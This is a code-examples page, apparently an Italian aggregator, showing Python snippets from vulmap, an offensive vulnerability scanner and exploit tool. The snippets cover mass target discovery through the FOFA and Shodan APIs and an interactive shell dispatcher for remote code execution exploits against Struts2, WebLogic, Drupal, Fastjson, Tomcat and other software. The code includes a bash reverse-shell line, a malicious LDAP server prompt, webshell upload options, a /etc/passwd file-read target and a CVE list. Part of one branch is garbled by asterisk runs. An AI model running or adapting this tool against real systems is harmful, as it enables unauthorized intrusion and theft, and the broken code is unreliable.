Esempi in Python per yellow

Linguaggio di programmazione: Python

Spazio dei nomi/nome del pacchetto: module.color.color

Metodo/funzione: yellow

Esempi su hotexamples.com: 6

yellow in Python: 6 esempi trovati. Questi sono i migliori esempi reali in Python per module.color.color.yellow, estratti da progetti open source. Li puoi valutare, per aiutarci a migliorare la qualità dei nostri esempi.

Esempio n. 1

Mostra file

    def control_options(args):  # 选项控制，用于处理所有选项
        delay = globals.get_value("DELAY")  # 获取全局变量延时时间DELAY
        now_warn = now.timed(de=delay) + color.red_warn()
        if args.socks:
            proxy_set(args.socks, "socks")  # proxy support socks5 http https
        elif args.http:
            proxy_set(args.http, "http")  # proxy support socks5 http https
        if args.list is False:  # 判断是否显示漏洞列表
            print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities"))
            print(vul_list())
        if args.thread_num != 10:  # 判断是否为默认线程
            print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
        if args.vul is not None:  # 判断是否-v进行漏洞利用
            args.mode = "exp"  # 若进行漏洞利用修改模式为exp
        if args.debug is False:  # 判断是否开启--debug功能
            print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
            globals.set_value("DEBUG", "debug")  # 设置全局变量DEBUG
        ceye()  # 测试ceye连接性


        if args.O_TEXT:  # 判断是否text输出
            if os.path.isfile(args.O_TEXT):  # 判断text输出文件是否冲突
                print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_TEXT + "] already exists"))
                exit(0)
        if args.O_JSON:  # 判断是否json输出
            if os.path.isfile(args.O_JSON):  # 判断json输出文件是否冲突
                print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists"))
                exit(0)
        if args.mode is None or args.mode == "poc":  # 判断是否进入poc模式
            if args.url is not None and args.file is None:  # 判断是否为仅-u扫描单个URL
                args.url = url_check(args.url)  # 处理url格式
                if survival_check(args.url) == "f":  # 检查目标存活状态
                    print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + args.url))
                    exit(0)  # 单个url时存活失败就退出
                print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url))
                if args.app is None:  # 判断是否扫描扫描全部webapps
                    globals.set_value("RUNALLPOC", True)  # 扫描单个URL并且所有webapps时RUNALLPOC=True
                    core.control_webapps("url", args.url, args.app, "poc")
                else:  # 否则扫描单个webapps
                    core.control_webapps("url", args.url, args.app, "poc")
            elif args.file is not None and args.url is None:  # 判断是否为仅-f批量扫描文件
                if os.path.isfile(args.file):  # 判断批量目标文件是否存在
                    print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file))
                else:  # 没有文件错误并退出
                    print(now.timed(de=0) + color.red_warn() + color.red(" Not found target file: " + args.file))
                    exit(0)
                if args.app is None:  # 判断是否扫描扫描全部webapps
                    globals.set_value("RUNALLPOC", "FILE")  # 批量扫描URL并且所有webapps时RUNALLPOC="FILE"
                    core.control_webapps("file", args.file, args.app, "poc")
                else:  # 否则批量扫描单个webapps
                    core.control_webapps("file", args.file, args.app, "poc")
            elif args.url is None and args.file is None and args.fofa is not None:  # 调用fofa api
                print(now.timed(de=0) + color.yel_info() + color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning"))
                if r"xxxxxx" in globals.get_value("fofa_key"):  # 使用fofa api之前判断fofa信息是否正确
                    print(now.timed(de=0) + color.red_warn() + color.red(" Check fofa email is xxxxxx Please replace key and email"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://fofa.so/user/users/info find key and email"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" How to use key and email reference https://github.com/zhzyker/vulmap"))
                    exit(0)
                else:
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email")))
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + globals.get_value("fofa_key")))
                fofa_list = fofa(args.fofa, args.size)  # 调用fofa api拿到目标数组默认100个
                if args.app is None:  # 判断是否扫描扫描全部webapps
                    core.control_webapps("fofa", fofa_list, args.app, "poc")
                else:
                    core.control_webapps("fofa", fofa_list, args.app, "poc")

            elif args.url is None and args.file is None and args.shodan is not None:  # 调用fofa api 或者 shodan api
                print(now.timed(de=0) + color.yel_info() + color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning"))
                if r"xxxxxx" in globals.get_value("shodan_key"):  # 使用shodan api之前判断shodan信息是否正确
                    print(now.timed(de=0) + color.red_warn() + color.red(" Check shodan key is xxxxxx Please replace key"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://account.shodan.io/ find key"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" How to use key reference https://github.com/zhzyker/vulmap"))
                    exit(0)
                else:
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + globals.get_value("shodan_key")))
                shodan_list = shodan_api(args.shodan)  # 调用shodan api拿到目标数组默认100个
                if args.app is None:  # 判断是否扫描扫描全部webapps
                    core.control_webapps("shodan", shodan_list, args.app, "poc")
                else:
                    core.control_webapps("shodan", shodan_list, args.app, "poc")

            if args.O_TEXT:
                print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
            if args.O_JSON:
                print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
        elif args.mode == "exp":  # 漏洞利用模式参数较少
            if args.vul is not None and args.url is not None:  # 判断是否进入漏洞利用模式
                core.control_webapps("url", args.url, args.vul, "exp")
            else:
                print(now_warn + color.red(" Options error, -v must specify -u"))
        else:
            print(now_warn + color.red(" Options error ... ..."))

Esempio n. 2

Mostra file

 def control_webapps(target_type, target, webapps, mode):
     t_num = globals.get_value("THREADNUM")  # 线程数量
     thread_poc = []  # 多线程字典，用于添加线程任务
     gevent_pool = []  # 协程字段，用于添加协程任务
     thread_pool = ThreadPoolExecutor(t_num)  # 多线程池数量t_num由选项控制，默认10线程
     webapps_identify = []  # 定义目标类型字典，用于目标类型识别并记录，为跑所有poc时进行类型识别
     if mode == "poc":  # poc漏洞扫描模式
         if target_type == "url":  # ========================================================= 第一种扫描仅扫描单个URL
             output("text", "[*] " + target)  # 丢给output模块判断是否输出文件
             if webapps is None:  # 判断是否进行指纹识别
                 Identify.start(target, webapps_identify)  # 第一种情况需要进行指纹识别
             elif r"all" in webapps:  # 判断是否扫描所有类型poc
                 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities"))
                 webapps_identify.append("all")  # 指定扫描所有时，需要将指纹全部指定为all
             else:
                 webapps_identify = webapps  # 指定但不是all，也可以指定多个类型，比如-a solr struts2
                 print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='')
                 count = 0  # 用于判断类型的数量，一个还是多个
                 for w_i in webapps_identify:
                     print(color.cyan(w_i), end=' ')
                     count += 1
                     if count % len(webapps_identify) == 0:
                         print(end='\n')
             core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target)  # 调用scan开始扫描
             joinall(gevent_pool)  # 运行协程池
             wait(thread_poc, return_when=ALL_COMPLETED)  # 等待所有多线程任务运行完
             print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended                             "))
         elif target_type == "file":  # ========================= 第二种扫描情况，批量扫描文件不指定webapps时需要做指纹识别
             count_line = -1  # 用于判断行数
             count_null = 0
             for line in open(target).readlines():  # 判断文件里有多少空行
                 line = line.strip()  # 读取目标时过滤杂质
                 if line == "":
                     count_null += 1
             for count_line, line in enumerate(open(target, 'rU')):  # 判断文件的行数
                 pass
             count_line += 1  # 行数加1
             target_num = count_line - count_null
             now_num = 0  # 当前数量
             target_list = []  # 批量扫描需要读取的字典
             with open(target, 'r') as _:  # 打开目标文件
                 for line in _:  # 用for循环读取文件
                     line = line.strip()  # 过滤杂质
                     if line:  # 判断是否结束
                         target_list.append(line)  # 读取到的目标加入字典准备扫描
                         now_num += 1  # 读取到之后当前数量+1
                         furl = line
                         furl = url_check(furl)  # url格式检测
                         output("text", "[*] " + furl)  # 丢给output模块判断是否输出文件
                         if survival_check(furl) == "f":  # 如果存活检测失败就跳过
                             print(now.timed(de=0) + color.red_warn() + color.red(
                                 " Current:[" + str(now_num) + "] Total:[" + str(
                                     target_num) + "] Survival check failed: " + furl))
                             continue
                         else:  # 存活不失败就正常显示
                             print(now.timed(de=0) + color.yel_info() + color.yellow(
                                 " Current:[" + str(now_num) + "] Total:[" + str(
                                     target_num) + "] Scanning target: " + furl))
                         if webapps is None:  # 判断是否要进行指纹识别
                             webapps_identify.clear()  # 可能跟单个url冲突需要清理字典
                             Identify.start(furl, webapps_identify)  # 识别指纹
                             # print(webapps_identify)
                         elif r"all" in webapps:  # 不识别指纹运行所有
                             print(now.timed(de=0) + color.yel_info() + color.yellow(
                                 " Specify to scan all vulnerabilities"))
                             webapps_identify.append("all")
                         else:
                             webapps_identify = webapps
                             print(now.timed(de=0) + color.yel_info() + color.yellow(
                                 " Specify scan vulnerabilities for: "),
                                   end='')
                             count = 0
                             for w_i in webapps_identify:
                                 print(color.cyan(w_i), end=' ')
                                 count += 1
                                 if count % len(webapps_identify) == 0:
                                     print(end='\n')
                         core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, furl)  # 开扫
                         joinall(gevent_pool)  # 运行协程池
                         wait(thread_poc, return_when=ALL_COMPLETED)  # 等待所有多线程任务运行完
                 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended                             "))
         elif target_type == "fofa" or target_type == "shodan":  # ======================================================= 第三种调用fofa api
             total = len(target)  # fofa api的总数，不出意外100个
             if webapps is not None:
                 if r"all" in webapps:  # 不识别直接扫描所有类型
                     print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities"))
                     webapps_identify.append("all")
                 else:
                     webapps_identify = webapps  # 扫描指定的类型
                     print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='')
                     count = 0
                     for w_i in webapps_identify:
                         print(color.cyan(w_i), end=' ')
                         count += 1
                         if count % len(webapps_identify) == 0:
                             print(end='\n')
             now_num = 0  # 当前第几个
             for f_target in target:
                 fofa_target = url_check(f_target)
                 output("text", "[*] " + fofa_target)  # 丢给output模块判断是否输出文件
                 now_num += 1
                 if survival_check(fofa_target) == "f":
                     print(now.timed(de=0) + color.red_warn() + color.red(
                         " Current:[" + str(now_num) + "] Total:[" + str(
                             total) + "] Survival check failed: " + fofa_target))
                     continue
                 else:
                     print(now.timed(de=0) + color.yel_info() + color.yellow(
                         " Current:[" + str(now_num) + "] Total:[" + str(
                             total) + "] Scanning target: " + fofa_target))
                 if webapps is None:  # 需要指纹识别
                     Identify.start(target, webapps_identify)  # 是否需要进行指纹识别
                 core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, fofa_target)
                 joinall(gevent_pool)  # 运行协程池
                 wait(thread_poc, return_when=ALL_COMPLETED)  # 等待所有多线程任务运行完
             print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended                             "))
     elif mode == "exp":  # 漏洞利用
         vul_num = webapps
         exploit(target, vul_num)  # 调用core中的exploit

Esempio n. 3

Mostra file

def exploit(target, vul_num):
    target = url_check(target)
    if survival_check(target) == "f":
        print(
            now.timed(de=0) + color.red_warn() +
            color.red(" Survival check failed: " + target))
        exit(0)
    delay = globals.get_value("DELAY")  # 获取全局变量DELAY
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Target url: " + target))
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Use exploit modules: " + vul_num))
    nc = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"nc\" bounce linux shell")
    up = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"upload\" upload webshell")
    rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(
        " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
    cmd = "whoami"  # 为了消除pycharm错误提示，没啥用
    file = "/etc/passwd"  # 为了消除pycharm错误提示，没啥用
    shiro_key = "1"  # 为了消除pycharm错误提示，没啥用
    shiro_gadget = "1"  # 为了消除pycharm错误提示，没啥用
    nexus_u = "admin"  # 为了消除pycharm错误提示，没啥用
    nexus_p = "admin"  # 为了消除pycharm错误提示

    if vul_num not in explists:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " The vulnerability does not support exploitation. Please refer to \"--list\""
            ))
        sys.exit(0)

    elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
        if os_check() == "linux" or os_check() == "other":
            shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
            shiro_gadget = input(
                now.timed(de=delay) + color.green("[+] gadget: "))
        elif os_check() == "windows":
            shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
            shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
    elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: WEB-INF/web.xml"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_tomcat.cve_2020_1938_exp(file)
    elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2019_3799_exp(file)
    elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2020_5410_exp(file)
    elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_flink.cve_2020_17519_exp(file)
    elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
        if os_check() == "linux" or os_check() == "other":
            nexus_u = input(
                now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows":
            nexus_u = input(
                now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)

    # 远程命令执行漏洞单独简单运行
    else:
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                exit(0)
            elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
                exp_apache_tomcat.cve_2017_12615_exp(cmd)
            elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
                exp_elasticsearch.cve_2014_3120_exp(cmd)
            elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
                exp_elasticsearch.cve_2015_1427_exp(cmd)
            elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
                exp_jenkins.cve_2018_1000861_exp(cmd)

            elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
                exp_oracle_weblogic.cve_2017_3506_exp(cmd)
            elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2017_10271_exp(cmd)
            elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
                exp_oracle_weblogic.cve_2018_2894_exp(cmd)
            elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2019_2725_exp(cmd)
            elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
                print(nc)
                exp_oracle_weblogic.cve_2019_2729_exp(cmd)
            elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
                exp_oracle_weblogic.cve_2020_2555_exp(cmd)
            elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
                exp_oracle_weblogic.cve_2020_2883_exp(cmd)
            elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
                exp_oracle_weblogic.cve_2020_14882_exp(cmd)
            elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
                exp_apache_solr.cve_2017_12629_exp(cmd)
            elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
                exp_apache_solr.cve_2019_17558_exp(cmd)
            elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
                exp_nexus.cve_2019_7238_exp(cmd)
            elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
                exp_redhat_jboss.cve_2010_0738_exp(cmd)
            elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
                exp_redhat_jboss.cve_2010_1428_exp(cmd)
            elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
                exp_redhat_jboss.cve_2015_7501_exp(cmd)
            elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
                exp_apache_unomi.cve_2020_13942_exp(cmd)

            elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
                print(up)
                exp_thinkphp.cve_2019_9082_exp(cmd)
            elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
                exp_thinkphp.cve_2018_20062_exp(cmd)
            elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
                exp_drupal.cve_2018_7600_exp(cmd)
            elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
                exp_drupal.cve_2018_7602_exp(cmd)
            elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
                exp_drupal.cve_2019_6340_exp(cmd)

            elif vul_num == "S2-005" or vul_num == "s2-005":
                exp_apache_struts2.s2_005_exp(cmd)
            elif vul_num == "S2-008" or vul_num == "s2-008":
                exp_apache_struts2.s2_008_exp(cmd)
            elif vul_num == "S2-009" or vul_num == "s2-009":
                exp_apache_struts2.s2_009_exp(cmd)
            elif vul_num == "S2-013" or vul_num == "s2-013":
                exp_apache_struts2.s2_013_exp(cmd)
            elif vul_num == "S2-015" or vul_num == "s2-015":
                exp_apache_struts2.s2_015_exp(cmd)
            elif vul_num == "S2-016" or vul_num == "s2-016":
                exp_apache_struts2.s2_016_exp(cmd)
            elif vul_num == "S2-029" or vul_num == "s2-029":
                exp_apache_struts2.s2_029_exp(cmd)
            elif vul_num == "S2-032" or vul_num == "s2-032":
                exp_apache_struts2.s2_032_exp(cmd)
            elif vul_num == "S2-045" or vul_num == "s2-045":
                exp_apache_struts2.s2_045_exp(cmd)
            elif vul_num == "S2-046" or vul_num == "s2-046":
                exp_apache_struts2.s2_046_exp(cmd)
            elif vul_num == "S2-048" or vul_num == "s2-048":
                exp_apache_struts2.s2_048_exp(cmd)
            elif vul_num == "S2-052" or vul_num == "s2-052":
                exp_apache_struts2.s2_052_exp(cmd)
            elif vul_num == "S2-057" or vul_num == "s2-057":
                exp_apache_struts2.s2_057_exp(cmd)
            elif vul_num == "S2-059" or vul_num == "s2-059":
                exp_apache_struts2.s2_059_exp(cmd)
            elif vul_num == "S2-061" or vul_num == "s2-061":
                exp_apache_struts2.s2_061_exp(cmd)
            elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                exp_apache_struts2.s2_devMode_exp(cmd)

            elif vul_num == "1.2.24":
                print(rmi_ldap)
                exp_fastjson.fastjson_1224_exp(cmd)
            elif vul_num == "1.2.47":
                print(rmi_ldap)
                exp_fastjson.fastjson_1247_exp(cmd)
            elif vul_num == "1.2.62":
                print(rmi_ldap)
                exp_fastjson.fastjson_1262_exp(cmd)
            else:
                pass

Esempio n. 4

Mostra file

def vul_list():
    vuln_list = color.cyan_fine("""
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
 | Target type       | Vuln Name        | Poc | Exp | Impact Version && Vulnerability description                 |
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
 | Apache ActiveMQ   | CVE-2015-5254    |  Y  |  N  | < 5.13.0, deserialization remote code execution             |
 | Apache ActiveMQ   | CVE-2016-3088    |  Y  |  Y  | < 5.14.0, http put&move upload webshell                     |
 | Apache Druid      | CVE-2021-25646   |  Y  |  Y  | < 0.20.1, apache druid console remote code execution        |
 | Apache Flink      | CVE-2020-17518   |  Y  |  N  | < 1.11.3 or < 1.12.0, upload path traversal                 |
 | Apache Flink      | CVE-2020-17519   |  Y  |  Y  | 1.5.1 - 1.11.2, 'jobmanager/logs' path traversal            |
 | Apache OFBiz      | CVE-2021-26295   |  Y  |  N  | < 17.12.06, rmi deserializes arbitrary code execution       |
 | Apache OFBiz      | CVE-2021-29200   |  Y  |  N  | < 17.12.07, rmi deserializes arbitrary code execution       |
 | Apache OFBiz      | CVE-2021-30128   |  Y  |  Y  | < 17.12.07, deserialize remote command execution            | 
 | Apache Shiro      | CVE-2016-4437    |  Y  |  Y  | <= 1.2.4, shiro-550, rememberme deserialization rce         |
 | Apache Solr       | CVE-2017-12629   |  Y  |  Y  | < 7.1.0, runexecutablelistener rce & xxe, only rce is here  |
 | Apache Solr       | CVE-2019-0193    |  Y  |  N  | < 8.2.0, dataimporthandler module remote code execution     |
 | Apache Solr       | CVE-2019-17558   |  Y  |  Y  | 5.0.0 - 8.3.1, velocity response writer rce                 |
 | Apache Solr       | time-2021-0318   |  Y  |  Y  | all, apache solr arbitrary file reading                     |
 | Apache Solr       | CVE-2021-27905   |  Y  |  N  | 7.0.0-7.7.3, 8.0.0-8.8.1, replication handler ssrf          |
 | Apache Struts2    | S2-005           |  Y  |  Y  | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce   |
 | Apache Struts2    | S2-008           |  Y  |  Y  | 2.0.0 - 2.3.17, debugging interceptor rce                   |
 | Apache Struts2    | S2-009           |  Y  |  Y  | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce         |
 | Apache Struts2    | S2-013           |  Y  |  Y  | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce        |
 | Apache Struts2    | S2-015           |  Y  |  Y  | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce        |
 | Apache Struts2    | S2-016           |  Y  |  Y  | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce          |
 | Apache Struts2    | S2-029           |  Y  |  Y  | 2.0.0 - 2.3.24.1, ognl interpreter rce                      |
 | Apache Struts2    | S2-032           |  Y  |  Y  | 2.3.20-28, cve-2016-3081 rce can be performed via method    |
 | Apache Struts2    | S2-045           |  Y  |  Y  | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce     |
 | Apache Struts2    | S2-046           |  Y  |  Y  | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce     |
 | Apache Struts2    | S2-048           |  Y  |  Y  | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce             |
 | Apache Struts2    | S2-052           |  Y  |  Y  | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce  |
 | Apache Struts2    | S2-057           |  Y  |  Y  | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce  |
 | Apache Struts2    | S2-059           |  Y  |  Y  | 2.0.0 - 2.5.20, cve-2019-0230 ognl interpreter rce          |
 | Apache Struts2    | S2-061           |  Y  |  Y  | 2.0.0-2.5.25, cve-2020-17530 ognl interpreter rce           |
 | Apache Struts2    | S2-devMode       |  Y  |  Y  | 2.1.0 - 2.5.1, devmode remote code execution                |
 | Apache Tomcat     | Examples File    |  Y  |  N  | all version, /examples/servlets/servlet                     |
 | Apache Tomcat     | CVE-2017-12615   |  Y  |  Y  | 7.0.0 - 7.0.81, put method any files upload                 |
 | Apache Tomcat     | CVE-2020-1938    |  Y  |  Y  | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read  |
 | Apache Unomi      | CVE-2020-13942   |  Y  |  Y  | < 1.5.2, apache unomi remote code execution                 |
 | CoreMail          | time-2021-0414   |  Y  |  N  | Coremail configuration information disclosure vulnerability |
 | Drupal            | CVE-2018-7600    |  Y  |  Y  | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution          |
 | Drupal            | CVE-2018-7602    |  Y  |  Y  | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce            |
 | Drupal            | CVE-2019-6340    |  Y  |  Y  | < 8.6.10, drupal core restful remote code execution         |
 | Ecology           | time-2021-0515   |  Y  |  Y  | <= 9.0, e-cology oa workflowservicexml rce                  |
 | Elasticsearch     | CVE-2014-3120    |  Y  |  Y  | < 1.2, elasticsearch remote code execution                  |
 | Elasticsearch     | CVE-2015-1427    |  Y  |  Y  | < 1.3.7, < 1.4.3, elasticsearch remote code execution       |
 | Exchange          | CVE-2021-26855   |  Y  |  N  | 2010 2013 2016 2019, microsoft exchange server ssrf         |
 | Exchange          | CVE-2021-27065   |  Y  |  Y  | 2010 2013 2016 2019, exchange arbitrary file write          |
 | Eyou Email        | CNVD-2021-26422  |  Y  |  Y  | eyou email system has remote command execution              |
 | F5 BIG-IP         | CVE-2020-5902    |  Y  |  Y  | < 11.6.x, f5 big-ip remote code execution                   |
 | F5 BIG-IP         | CVE-2021-22986   |  Y  |  Y  | < 16.0.1, f5 big-ip remote code execution                   |
 | Fastjson          | VER-1224-1       |  Y  |  Y  | <= 1.2.24 fastjson parse object remote code execution       |
 | Fastjson          | VER-1224-2       |  Y  |  Y  | <= 1.2.24 fastjson parse object remote code execution       |
 | Fastjson          | VER-1224-3       |  Y  |  Y  | <= 1.2.24 fastjson parse object remote code execution       |
 | Fastjson          | VER-1247         |  Y  |  Y  | <= 1.2.47 fastjson autotype remote code execution           |
 | Fsatjson          | VER-1262         |  Y  |  Y  | <= 1.2.62 fastjson autotype remote code execution           |
 | Jenkins           | CVE-2017-1000353 |  Y  |  N  | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution    |
 | Jenkins           | CVE-2018-1000861 |  Y  |  Y  | <= 2.153, LTS <= 2.138.3, remote code execution             |
 | Laravel           | CVE-2018-15133   |  N  |  Y  | 5.5.x <= 5.5.40, 5.6.x <= 5.6.29, laravel get app_key rce   |
 | Laravel           | CVE-2021-3129    |  Y  |  N  | ignition <= 2.5.1, laravel debug mode remote code execution |
 | Nexus OSS/Pro     | CVE-2019-7238    |  Y  |  Y  | 3.6.2 - 3.14.0, remote code execution vulnerability         |
 | Nexus OSS/Pro     | CVE-2020-10199   |  Y  |  Y  | 3.x <= 3.21.1, remote code execution vulnerability          |
 | Node.JS           | CVE-2021-21315   |  Y  |  N  | systeminformation < 5.3.1, node.js command injection        |
 | Oracle Weblogic   | CVE-2014-4210    |  Y  |  N  | 10.0.2 - 10.3.6, weblogic ssrf vulnerability                |
 | Oracle Weblogic   | CVE-2016-0638    |  Y  |  N  | 10.3.6.0, 12.2.1-3, t3 deserialization rce                  |
 | Oracle Weblogic   | CVE-2017-3506    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce       |
 | Oracle Weblogic   | CVE-2017-10271   |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce       |
